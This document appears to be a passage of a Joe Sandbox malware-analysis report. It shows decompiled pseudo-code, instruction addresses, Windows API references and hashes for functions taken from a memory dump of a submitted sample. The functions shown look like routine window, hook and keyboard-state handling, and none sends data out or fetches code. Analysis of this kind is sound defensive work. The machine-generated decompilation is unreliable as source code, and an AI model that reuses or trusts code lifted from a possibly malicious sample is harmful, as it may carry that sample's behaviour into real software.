						if( *((intOrPtr*)(__ecx + 0x254)) != 0 ||  *((intOrPtr*)(__ecx + 0x258)) != 0 ||  *((intOrPtr*)(__ecx + 0x25c)) != 0) {
							_t126 =  *((intOrPtr*)(_t133 + 0x2b0));
							if( *((intOrPtr*)(_t133 + 0x2b0)) > 0) {
								 *(_t133 + 0x2a4) =  *(_t133 + 0x2a4) +  *((intOrPtr*)( *((intOrPtr*)(E00CBFD51(_t133, _t133 + 0x94, _t166, _t167, _t126 - 1))) + 0x10)) + 0xfffffffe +  *((intOrPtr*)(_t133 + 0x2e8)) -  *((intOrPtr*)(_t133 + 0x2e0)) -  *((intOrPtr*)( *((intOrPtr*)(E00CBFD51(_t133, _t133 + 0x94, _t166, _t167, _t126 - 1))) + 0x18)) -  *0xe6843c;
								 *((intOrPtr*)(_t133 + 0x2b0)) =  *((intOrPtr*)(_t133 + 0x2b0)) - 1;
							}
							goto L33;
						} else {
							_t97 = _t164 - 0x14;
							L32:
							 *(_t133 + 0x2a4) = _t97;
							L33:
							if( *((intOrPtr*)(_t133 + 0x254)) != _t166 ||  *((intOrPtr*)(_t133 + 0x258)) != _t166 ||  *((intOrPtr*)(_t133 + 0x25c)) != _t166) {
								_t98 =  *(_t133 + 0x2a4);
								goto L41;
							} else {
								_t98 =  *(_t133 + 0x2a4);
								_t147 = _t166;
								if(_t98 >= 0) {
									_t147 = _t98;
								}
								_t164 =  *(_t133 + 0x2a8);
								if(_t147 < _t164) {
									L41:
									if(_t98 < 0) {
										_t98 = _t166;
									}
									goto L43;
								} else {
									_t98 = _t164;
									L43:
									 *(_t133 + 0x2a4) = _t98;
									if(_v32 != _t98) {
										 *0xe17a64();
										 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 0x2dc))))();
										E00D06C9B(_t133, _t133);
										InvalidateRect( *(_t133 + 0x20), _t166, 1);
										UpdateWindow( *(_t133 + 0x20));
									}
									L49:
									_t90 = 1;
									L18:
									_pop(_t165);
									_pop(_t167);
									goto L19;
								}
							}
						}
					}
				} else {
					_push(_t89);
					_t90 = E00CB3311(__ecx, __ecx, __edx, __edi, _a4);
					L19:
					return E00DDCBCE(_t90, _t133, _v8 ^ _t172, _t164, _t165, _t167);
				}
			}

0x00d033fc
0x00d033fc
0x00d033fc
0x00d03402
0x00d03409
0x00d0340c
0x00d03410
0x00d03414
0x00d03424
0x00d0342a
0x00d03430
0x00d03431
0x00d03432
0x00d03434
0x00d03439
0x00d034ab
0x00d034b3
0x00d035e8
0x00d035f0
0x00d035ff
0x00d03607
0x00d0369f
0x00d036a7
0x00000000
0x00d036b6
0x00d036c0
0x00d036c8
0x00d036cc
0x00d036d7
0x00d036d7
0x00000000
0x00d036cc
0x00d03616
0x00d03616
0x00000000
0x00d03616
0x00d035f7
0x00d035f7
0x00000000
0x00d035f7
0x00d034c2
0x00d034c8
0x00d0358d
0x00d035a4
0x00d035b0
0x00d035b9
0x00d035d2
0x00d035da
0x00d035e0
0x00d035e0
0x00000000
0x00d0359f
0x00d0359f
0x00000000
0x00d0359f
0x00d0358d
0x00d034d1
0x00d034db
0x00d034de
0x00d034e1
0x00d034e4
0x00d034ee
0x00d034f8
0x00d034fe
0x00d0350b
0x00d03513
0x00d03513
0x00d03520
0x00d03526
0x00d0352d
0x00d03542
0x00d0354a
0x00d03555
0x00000000
0x00d0355b
0x00d03563
0x00d03568
0x00d0356b
0x00d0356b
0x00d03571
0x00000000
0x00d03571
0x00d03555
0x00d03440
0x00d03446
0x00d03460
0x00d03468
0x00d0349a
0x00d034a0
0x00d034a0
0x00000000
0x00d03458
0x00d03458
0x00d0361c
0x00d0361c
0x00d03622
0x00d03628
0x00d03656
0x00000000
0x00d0363a
0x00d0363a
0x00d03640
0x00d03644
0x00d03646
0x00d03646
0x00d03648
0x00d03650
0x00d0365c
0x00d0365e
0x00d03660
0x00d03660
0x00000000
0x00d03652
0x00d03652
0x00d03662
0x00d03662
0x00d0366b
0x00d03677
0x00d0367f
0x00d03683
0x00d0368e
0x00d03697
0x00d03697
0x00d036dd
0x00d036df
0x00d03576
0x00d03576
0x00d03577
0x00000000
0x00d03577
0x00d03650
0x00d03628
0x00d03446
0x00d03416
0x00d03416
0x00d0341a
0x00d03578
0x00d03584
0x00d03584

APIs

InvalidateRect.USER32(?,00000000,00000001), ref: 00D0368E
UpdateWindow.USER32(?), ref: 00D03697
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00D036D7

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: InvalidateMessageRectSendUpdateWindow
String ID:
API String ID: 1482505787-0
Opcode ID: 324294d04c38ae3fdc628a41293586422852242e8d5c730be9237a7d844c87fa
Instruction ID: 665ca6fb28a758d258a787a46819cbf965cff6c4c68e2da6f26bc839365068fa
Opcode Fuzzy Hash: 324294d04c38ae3fdc628a41293586422852242e8d5c730be9237a7d844c87fa
Instruction Fuzzy Hash: C0914830A006059FCF15DF25C998BAA77B8EF44301F5840BAEC4A9F2A6DB31DA41CB31

Uniqueness

Uniqueness Score: -1.00%

Function 00CF97D7 Relevance: 9.2, APIs: 6, Instructions: 183
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00CF97D7(void* __ebx, intOrPtr __ecx, long __edx, int _a4, int _a8, long _a12) {
				intOrPtr _v0;
				struct tagPOINT _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v28;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t49;
				long _t50;
				long _t54;
				long _t58;
				long _t61;
				long _t69;
				long _t70;
				long _t71;
				long _t76;
				long _t80;
				void* _t81;
				intOrPtr _t88;
				long _t103;
				long _t104;
				long _t107;
				void* _t114;
				long _t117;
				long _t118;
				struct tagPOINT* _t121;
				intOrPtr _t122;

				_t113 = __edx;
				_t89 = __ecx;
				_t86 = __ebx;
				_push(__ecx);
				_push(__ecx);
				if(_a4 != 0) {
					return CallNextHookEx( *0xe87384, _a4, _a8, _a12);
				}
				_t121 = _a12;
				__eflags = _t121;
				if(__eflags != 0) {
					__eflags = _a8 - 0x200;
					if(_a8 != 0x200) {
						L16:
						__eflags = 0;
						return 0;
					}
					_push(_t114);
					_push(_t121->y);
					_t118 = E00CACA6C(0xe68384, E00CB277F(__ebx, _t89, _t113, WindowFromPoint(_t121->x)));
					__eflags = _t118;
					if(__eflags != 0) {
						_t113 = _t121->y;
						_v12.x =  *_t121;
						_v12.y = _t121->y;
						ScreenToClient( *(_t118 + 0x20),  &_v12);
						_push(_v12.y);
						_push(_v12.x);
						_push(0);
						L00CF546B(__ebx, _t118, _t121->y, _t118, _t121, __eflags);
					}
					_t69 =  *0xe87388; // 0x0
					__eflags = _t69;
					if(_t69 == 0) {
						L15:
						 *0xe87388 = _t118;
						goto L16;
					} else {
						__eflags = _t69 - _t118;
						if(_t69 == _t118) {
							goto L15;
						}
						 *(_t69 + 0xba8) =  *(_t69 + 0xba8) & 0x00000000;
						_t70 =  *0xe87388; // 0x0
						 *(_t70 + 0xcfc) =  *(_t70 + 0xcfc) | 0xffffffff;
						 *(_t70 + 0xd00) =  *(_t70 + 0xd00) | 0xffffffff;
						_t71 =  *0xe87388; // 0x0
						_t103 =  *(_t71 + 0xbf0);
						_v12.y = _t103;
						__eflags = _t103;
						if(_t103 < 0) {
							goto L15;
						}
						 *(_t71 + 0xbf0) =  *(_t71 + 0xbf0) | 0xffffffff;
						__eflags = _t118;
						if(_t118 == 0) {
							L13:
							_t104 =  *0xe87388; // 0x0
							L14:
							 *0xe17a64( *((intOrPtr*)(_t104 + 0xbf0)));
							 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x3b0))))();
							_t107 =  *0xe87388; // 0x0
							E00CF1BC5(_t86, _t107, _v12.y);
							_t76 =  *0xe87388; // 0x0
							UpdateWindow( *(_t76 + 0x20));
							goto L15;
						}
						_t80 = E00CACA6C(0xe68550, E00CB277F(_t86, _t103, _t113, GetParent( *(_t118 + 0x20))));
						__eflags = _t80;
						if(_t80 == 0) {
							goto L13;
						}
						_t81 = E00D12691(_t80);
						_t104 =  *0xe87388; // 0x0
						__eflags = _t81 - _t104;
						if(_t81 == _t104) {
							goto L15;
						}
						goto L14;
					}
				}
				E00CAA4E7(__ebx, __ecx, _t114, _t121, __eflags);
				asm("int3");
				_push(__ebx);
				_push(_t121);
				_push(_t114);
				_t122 = __ecx;
				_v28 = __ecx;
				_t49 = E00D2428E(__ebx, __edx, _t114, _v12.x);
				__eflags = _t49;
				if(_t49 == 0) {
					L28:
					_t50 = 0;
					__eflags = 0;
				} else {
					_v20 = E00D244CC(__ebx, __edx, _v0);
					_v12.x = 0;
					_t54 = E00CF2967(_t122 + 0xd20, __eflags,  &_v20,  &_v12);
					__eflags = _t54;
					if(_t54 == 0) {
						goto L28;
					} else {
						_t88 = E00CF133D(0);
						 *0xe885b8 = 0;
						__eflags = _v12.x;
						if(_v12.x == 0) {
							L27:
							 *0xe885b8 = _t88;
							_t50 = E00CF6E96(_t88, _t122, _t113, _v12.x);
						} else {
							_t117 = E00CACA6C(0xe687e4, _v12.x);
							__eflags = _t117;
							if(_t117 == 0) {
								goto L27;
							} else {
								 *0xe17a64(_v16, 1);
								_t58 =  *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x20))))();
								__eflags = _t58;
								if(_t58 == 0) {
									_t122 = _v16;
									goto L27;
								} else {
									 *0xe17a64();
									_t61 =  *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x70))))();
									__eflags = _t61;
									if(_t61 != 0) {
										SendMessageA( *( *((intOrPtr*)(_t117 + 0x8c)) + 0x20), 0x100, 0x24, 0);
									}
									E00CF8516(_v16, _t117);
									 *0xe885b8 = _t88;
									_t50 = 1;
								}
							}
						}
					}
				}
				return _t50;
			}

0x00cf97d7
0x00cf97d7
0x00cf97d7
0x00cf97da
0x00cf97db
0x00cf97e0
0x00000000
0x00cf97f1
0x00cf97fd
0x00cf9800
0x00cf9802
0x00cf9808
0x00cf980f
0x00cf9927
0x00cf9927
0x00000000
0x00cf9929
0x00cf9815
0x00cf9816
0x00cf9832
0x00cf9836
0x00cf9838
0x00cf983f
0x00cf9846
0x00cf9849
0x00cf984c
0x00cf9852
0x00cf9857
0x00cf985a
0x00cf985c
0x00cf985c
0x00cf9861
0x00cf9866
0x00cf9868
0x00cf9920
0x00cf9920
0x00000000
0x00cf986e
0x00cf986e
0x00cf9870
0x00000000
0x00000000
0x00cf9876
0x00cf987d
0x00cf9882
0x00cf9889
0x00cf9890
0x00cf9895
0x00cf989b
0x00cf989e
0x00cf98a0
0x00000000
0x00000000
0x00cf98a2
0x00cf98a9
0x00cf98ab
0x00cf98e0
0x00cf98e0
0x00cf98e6
0x00cf98f6
0x00cf9902
0x00cf9907
0x00cf990d
0x00cf9912
0x00cf991a
0x00000000
0x00cf991a
0x00cf98c2
0x00cf98c9
0x00cf98cb
0x00000000
0x00000000
0x00cf98cf
0x00cf98d4
0x00cf98da
0x00cf98dc
0x00000000
0x00000000
0x00000000
0x00cf98de
0x00cf9868
0x00cf992e
0x00cf9933
0x00cf993a
0x00cf993b
0x00cf993c
0x00cf9940
0x00cf9942
0x00cf9945
0x00cf994a
0x00cf994c
0x00cf9a15
0x00cf9a15
0x00cf9a15
0x00cf9952
0x00cf995a
0x00cf996c
0x00cf9970
0x00cf9975
0x00cf9977
0x00000000
0x00cf997d
0x00cf9983
0x00cf9985
0x00cf998b
0x00cf998e
0x00cf9a03
0x00cf9a08
0x00cf9a0e
0x00cf9990
0x00cf999d
0x00cf99a1
0x00cf99a3
0x00000000
0x00cf99a5
0x00cf99b1
0x00cf99b9
0x00cf99bb
0x00cf99bd
0x00cf9a00
0x00000000
0x00cf99bf
0x00cf99c6
0x00cf99ce
0x00cf99d0
0x00cf99d2
0x00cf99e6
0x00cf99e6
0x00cf99f0
0x00cf99f7
0x00cf99fd
0x00cf99fd
0x00cf99bd
0x00cf99a3
0x00cf998e
0x00cf9977
0x00cf9a1b

APIs

CallNextHookEx.USER32(00000000,?,?), ref: 00CF97F1

Part of subcall function 00D2428E: GetKeyboardState.USER32(?), ref: 00D242A8
Part of subcall function 00D2428E: GetKeyboardLayout.USER32(?), ref: 00D242C4
Part of subcall function 00D2428E: MapVirtualKeyA.USER32 ref: 00D242D1
Part of subcall function 00D2428E: ToAsciiEx.USER32(?,00000000,?,?,00000000,00000000), ref: 00D242EC

Part of subcall function 00D244CC: GetAsyncKeyState.USER32(00000012), ref: 00D244EE
Part of subcall function 00D244CC: GetAsyncKeyState.USER32(00000012), ref: 00D2450E

WindowFromPoint.USER32(?,?), ref: 00CF981B
ScreenToClient.USER32 ref: 00CF984C
GetParent.USER32(?), ref: 00CF98B0
UpdateWindow.USER32(?), ref: 00CF991A
SendMessageA.USER32(00000024,00000100,00000024,00000000), ref: 00CF99E6

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: State$AsyncKeyboardWindow$AsciiCallClientFromHookLayoutMessageNextParentPointScreenSendUpdateVirtual
String ID:
API String ID: 569180403-0
Opcode ID: c4ca77a390cc47e6eec1b0e1ac0688b6a5e96879b55b2b1567125cf1491f5e49
Instruction ID: 6e109a18620b37edec387bd4f39e1c3a65341bb3597a04678a57d9ef4cb57278
Opcode Fuzzy Hash: c4ca77a390cc47e6eec1b0e1ac0688b6a5e96879b55b2b1567125cf1491f5e49
Instruction Fuzzy Hash: D661C035604309EFCF15AFA1DC84ABD7BB5FF44720F240169F959A72A1DB309A40EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00DDEA77 Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00DDEAC0
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00DDEB2B
LCMapStringEx.KERNEL32 ref: 00DDEB48
LCMapStringEx.KERNEL32 ref: 00DDEB87
LCMapStringEx.KERNEL32 ref: 00DDEBE6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00DDEC09

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: d08f35d9424fdc3abb6a6190cd394abd7520a81d42a0df9a344f0a588aac8eb9
Instruction ID: 1a60cd50240a9d7b6935b6a12f89634d281bff0b40bf4dc11f59df1965998ee7
Opcode Fuzzy Hash: d08f35d9424fdc3abb6a6190cd394abd7520a81d42a0df9a344f0a588aac8eb9
Instruction Fuzzy Hash: C051B07261021AAFEB20AF65CC45FAB7BB9EF44750F194526F915EA250DB30DC10DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CCA5F2 Relevance: 9.2, APIs: 6, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00CCA5F2(void* __ebx, struct HWND__* __ecx, signed int __edx, void* __edi, void* __esi, char _a4, struct HWND__* _a8, struct HWND__* _a12) {
				signed int _v8;
				char* _v20;
				struct tagRECT _v36;
				signed int _v40;
				signed int _v44;
				struct tagPOINT _v52;
				char _v56;
				struct HWND__* _v60;
				intOrPtr* _v64;
				char _v84;
				void* _t78;
				void* _t86;
				struct HWND__* _t88;
				intOrPtr _t95;
				struct HWND__* _t102;
				signed int _t104;
				char* _t132;
				char* _t141;
				intOrPtr _t143;
				struct HWND__* _t158;
				signed int _t160;
				intOrPtr* _t163;
				struct HWND__* _t167;
				intOrPtr _t168;
				void* _t170;

				_t153 = __edx;
				if(_a4 == 0) {
					E00CAA4E7(__ebx, __ecx, __edi, __esi, __eflags);
					asm("int3");
					_push(0x44);
					E00DDD55F(0xe097e9, __ebx, __edi, __esi);
					_t130 = __ecx;
					_t163 = _a4;
					_t132 = __ecx + 0xe0;
					_v64 = _t163;
					__eflags = E00CBDF4E(_t132, 0, 0);
					if(__eflags == 0) {
						__eflags = __ecx;
						if(__eflags == 0) {
							L21:
							E00CAA4E7(_t130, _t132, 0, _t163, __eflags);
							asm("int3");
							_push(4);
							E00DDD52C(0xe080e2, _t130, 0, _t163);
							_t164 = _t132;
							_v20 = _t132;
							_v8 = _v8 & 0x00000000;
							_t78 = E00CAA9F1();
							_v8 = _v8 | 0xffffffff;
							E00CA2C3F(_t132, _t164, _t78);
							_t158 = _a8;
							_v8 = 1;
							__eflags = _t158;
							if(_t158 > 0) {
								E00DDFBE0(_t158, E00CA2BCE(_t130, _t164, _t164, _t158), _a4, _t158);
								E00CA2BA5(_t130, _t164, _t158);
							}
							return E00DDD4FA(_t164);
						} else {
							__eflags =  *(__ecx + 0x20);
							if(__eflags == 0) {
								goto L21;
							} else {
								_push(__ecx);
								E00CB8FDD(__ecx,  &_v84, __edx, 0, _t163, __eflags);
								_v8 = 0;
								_t86 = E00CC19ED();
								_t132 =  &_v84;
								_t88 = E00CBA2B8(_t132, _t86 + 0x144);
								_v60 = _t88;
								__eflags = _t88;
								if(__eflags == 0) {
									goto L21;
								} else {
									E00CA67E1( &_v56);
									_v8 = 1;
									E00CB2D00(_t130,  &_v56);
									_v52.x = 0;
									_v52.y = 0;
									_v44 = 0;
									_v40 = 0;
									GetClientRect( *(_t130 + 0x20),  &_v52);
									asm("movsd");
									_t95 = _v56;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									 *0xe17a64(_t95,  *((intOrPtr*)(_t95 - 0xc)),  &_v36, 0x420);
									_t141 =  &_v84;
									 *((intOrPtr*)( *((intOrPtr*)(_v84 + 0x68))))();
									InflateRect( &_v36, 3, 3);
									__eflags = _a8;
									_t167 = _a12;
									if(_a8 != 0) {
										L11:
										_t102 = E00CB277F(_t130, _t141, _t153, GetParent( *(_t130 + 0x20)));
										__eflags = _t102;
										if(_t102 != 0) {
											_t102 =  *(_t102 + 0x20);
										}
										MapWindowPoints( *(_t130 + 0x20), _t102,  &_v52, 2);
										__eflags = _t167;
										_t168 = _v36.right;
										if(_t167 == 0) {
											_t160 = 0;
											__eflags = 0;
										} else {
											asm("cdq");
											_t160 = _v44 - _t168 - _v52.x + _v36.left - _t153 >> 1;
										}
										__eflags = _a8;
										_t143 = _v36.bottom;
										if(_a8 == 0) {
											_t104 = 0;
											__eflags = 0;
										} else {
											asm("cdq");
											_t104 = _v36.top - _t143 - _v52.y + _v40 - _t153 >> 1;
										}
										_t155 = _v52.x + _t160;
										_t105 = _t104 + _v52.y;
										__eflags = _t104 + _v52.y;
										_push(0x14);
									} else {
										__eflags = _t167;
										if(_t167 != 0) {
											goto L11;
										} else {
											_t168 = _v36.right;
											_t155 = _t153 | 0xffffffff;
											_t143 = _v36.bottom;
											_t105 = _t153 | 0xffffffff;
											_push(0x16);
										}
									}
									_pop(0);
									E00CB7A83(_t130, 0, _t155, _t105, _t168 - _v36.left, _t143 - _v36.top, 0);
									E00CBA2B8( &_v84, _v60);
									_t163 = _v64;
									 *_t163 = _v36.right - _v36.left;
									 *((intOrPtr*)(_t163 + 4)) = _v36.bottom - _v36.top;
									E00CA2975(_v36.bottom - _v36.top, _v56 - 0x10);
									E00CB9150( &_v84);
									goto L4;
								}
							}
						}
					} else {
						_push(0);
						_push(_t163);
						E00CC7220(__ecx, __ecx, __edx, 0, _t163, __eflags);
						L4:
						return E00DDD50E(_t130, 0, _t163);
					}
				} else {
					_push(__esi);
					_t170 = __ecx + 0x7bc;
					_push(E00DEC1A0(_a4));
					return E00CA2CD7(__ebx, _t170, __edi, _t170, _a4);
				}
			}

0x00cca5f2
0x00cca5f9
0x00cca61b
0x00cca620
0x00cca621
0x00cca628
0x00cca62d
0x00cca62f
0x00cca632
0x00cca63a
0x00cca644
0x00cca646
0x00cca65b
0x00cca65d
0x00cca7d3
0x00cca7d3
0x00cca7d8
0x00cca7d9
0x00cca7e0
0x00cca7e5
0x00cca7e7
0x00cca7ea
0x00cca7ee
0x00cca7f3
0x00cca7fa
0x00cca7ff
0x00cca802
0x00cca809
0x00cca80b
0x00cca81c
0x00cca827
0x00cca827
0x00cca833
0x00cca663
0x00cca663
0x00cca666
0x00000000
0x00cca66c
0x00cca66c
0x00cca670
0x00cca675
0x00cca678
0x00cca682
0x00cca686
0x00cca68b
0x00cca68e
0x00cca690
0x00000000
0x00cca696
0x00cca699
0x00cca6a1
0x00cca6a8
0x00cca6b0
0x00cca6b7
0x00cca6ba
0x00cca6bd
0x00cca6c0
0x00cca6cc
0x00cca6d6
0x00cca6d9
0x00cca6da
0x00cca6db
0x00cca6e8
0x00cca6ee
0x00cca6f1
0x00cca6fb
0x00cca701
0x00cca705
0x00cca708
0x00cca71d
0x00cca727
0x00cca72c
0x00cca72e
0x00cca730
0x00cca730
0x00cca73d
0x00cca743
0x00cca745
0x00cca748
0x00cca75e
0x00cca75e
0x00cca74a
0x00cca755
0x00cca75a
0x00cca75a
0x00cca760
0x00cca764
0x00cca767
0x00cca77b
0x00cca77b
0x00cca769
0x00cca774
0x00cca777
0x00cca777
0x00cca780
0x00cca782
0x00cca782
0x00cca785
0x00cca70a
0x00cca70a
0x00cca70c
0x00000000
0x00cca70e
0x00cca70e
0x00cca711
0x00cca714
0x00cca717
0x00cca719
0x00cca719
0x00cca70c
0x00cca78d
0x00cca797
0x00cca7a2
0x00cca7a7
0x00cca7b3
0x00cca7be
0x00cca7c1
0x00cca7c9
0x00000000
0x00cca7c9
0x00cca690
0x00cca666
0x00cca648
0x00cca648
0x00cca649
0x00cca64c
0x00cca651
0x00cca658
0x00cca658
0x00cca5fb
0x00cca5fb
0x00cca5ff
0x00cca60b
0x00cca618
0x00cca618

APIs

_strlen.LIBCMT ref: 00CCA605
__EH_prolog3_GS.LIBCMT ref: 00CCA628

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3__strlen
String ID:
API String ID: 807648885-0
Opcode ID: 42c4fcc7d31723a7e3a8282cd8e9f3d4d7d474e5c97a92d175639c52e5724ced
Instruction ID: 114a883f9bb0385a38abb2ed3500cd4a03d571187f033f4f052e6db4a3b65767
Opcode Fuzzy Hash: 42c4fcc7d31723a7e3a8282cd8e9f3d4d7d474e5c97a92d175639c52e5724ced
Instruction Fuzzy Hash: 42514871900219ABDF00DFA9CD89EEEBBB9FF48314F044118F915BB251DB70AA04DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CEE964 Relevance: 9.2, APIs: 6, Instructions: 172
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00CEE964(intOrPtr* __ecx, long __edx) {
				signed int _v8;
				struct tagRECT _v24;
				intOrPtr _v56;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v120;
				void* _v124;
				long _v128;
				void* _v132;
				intOrPtr _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				signed int _t63;
				intOrPtr _t71;
				long _t72;
				intOrPtr _t85;
				intOrPtr _t94;
				void* _t95;
				int _t96;
				long _t102;
				signed int _t110;
				long _t120;
				long _t122;
				intOrPtr* _t124;
				void* _t125;
				signed int _t128;
				void* _t129;
				intOrPtr _t134;
				signed int _t135;

				_t122 = __edx;
				_t58 =  *0xe68dd4; // 0x8d2643c2
				_t59 = _t58 ^ _t135;
				_v8 = _t58 ^ _t135;
				_t124 = __ecx;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
					L24:
					return E00DDCBCE(_t59, _t95, _v8 ^ _t135, _t122, _t124, _t125);
				} else {
					 *0xe17a64(_t125, _t95);
					_t63 =  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x194))))();
					_t102 =  *((intOrPtr*)(__ecx + 0xc40));
					_t128 = _t63 & 0x0000a000;
					_v128 = _t102;
					if(_t102 == 0) {
						L10:
						_t129 = E00CACA6C(0xe2b5f0, E00CB277F(_t95, _t102, _t122, GetParent( *(_t124 + 0x20))));
						if(_t129 == 0) {
							E00CEF120(_t124, _t122, __eflags);
							L23:
							 *0xe17a64();
							 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 0x3e4))))();
							_t59 = RedrawWindow( *(_t124 + 0x20), 0, 0, 0x505);
							_pop(_t125);
							_pop(_t95);
							goto L24;
						}
						_t71 = E00CAAAB7(_t129);
						_v136 = _t71;
						_t72 = SendMessageA( *(_t71 + 0x20), 0x40c, 0, 0);
						_t96 = 0;
						_v124 =  *((intOrPtr*)(_t129 + 0x2c0));
						_t110 = 0x230;
						_v128 = _t72;
						_v120 = 0x230;
						if(_t72 == 0) {
							L16:
							_v120 = _t110 ^ 0x00000010;
							if(_t96 < _t72) {
								 *0xe17a64();
								 *((intOrPtr*)(_t124 + 0xbe8)) =  *((intOrPtr*)( *((intOrPtr*)( *_t124 + 0x41c))))();
								 *0xe17a64( &_v132, 0);
								 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 0x2a4))))();
								_v24.left = 0;
								_v24.top = 0;
								_v24.right = 0;
								_v24.bottom = 0;
								SetRectEmpty( &_v24);
								E00CE27FE(_t124,  &_v24, 1);
								_t122 = _v132 + _v24.left - _v24.right;
								_t120 = _v24.top - _v24.bottom + _v128;
								_v128 = _t120;
								_v132 = _t122;
								if(_t122 <= 0) {
									_t122 = 0;
									_v132 = 0;
								}
								if(_t120 <= 0) {
									_t120 = 0;
									_v128 = 0;
								}
								_t85 =  *0xe683d0; // 0x17
								_v88 = _t85;
								_v84 = _t120;
								_v56 = _t122;
								SendMessageA( *(_v136 + 0x20), 0x406, _t96,  &_v124);
							}
							goto L23;
						}
						_t134 = _v136;
						while(1) {
							SendMessageA( *(_t134 + 0x20), 0x41d, _t96,  &_v124);
							_t72 = _v128;
							if(_v92 ==  *(_t124 + 0x20)) {
								break;
							}
							_t96 = _t96 + 1;
							if(_t96 < _t72) {
								continue;
							}
							break;
						}
						_t110 = _v120;
						goto L16;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t102 = _t124 + 0xc3c;
						_t94 =  *((intOrPtr*)(E00CB29D4(_t124, _t128,  &_v128)));
						if(_t94 == 0) {
							goto L10;
						}
						if(( *(_t94 + 0x24) & 0x00000001) != 0 ||  *((intOrPtr*)(_t124 + 0xb88)) == 0 || _t128 == 0) {
							_t102 = 0;
							__eflags = 0;
						} else {
							_t102 = 1;
						}
						 *((intOrPtr*)(_t94 + 0x18)) = _t102;
						if(_v128 != 0) {
							continue;
						} else {
							goto L10;
						}
					}
					goto L10;
				}
			}

0x00cee964
0x00cee96d
0x00cee972
0x00cee974
0x00cee978
0x00cee97c
0x00ceeb65
0x00ceeb71
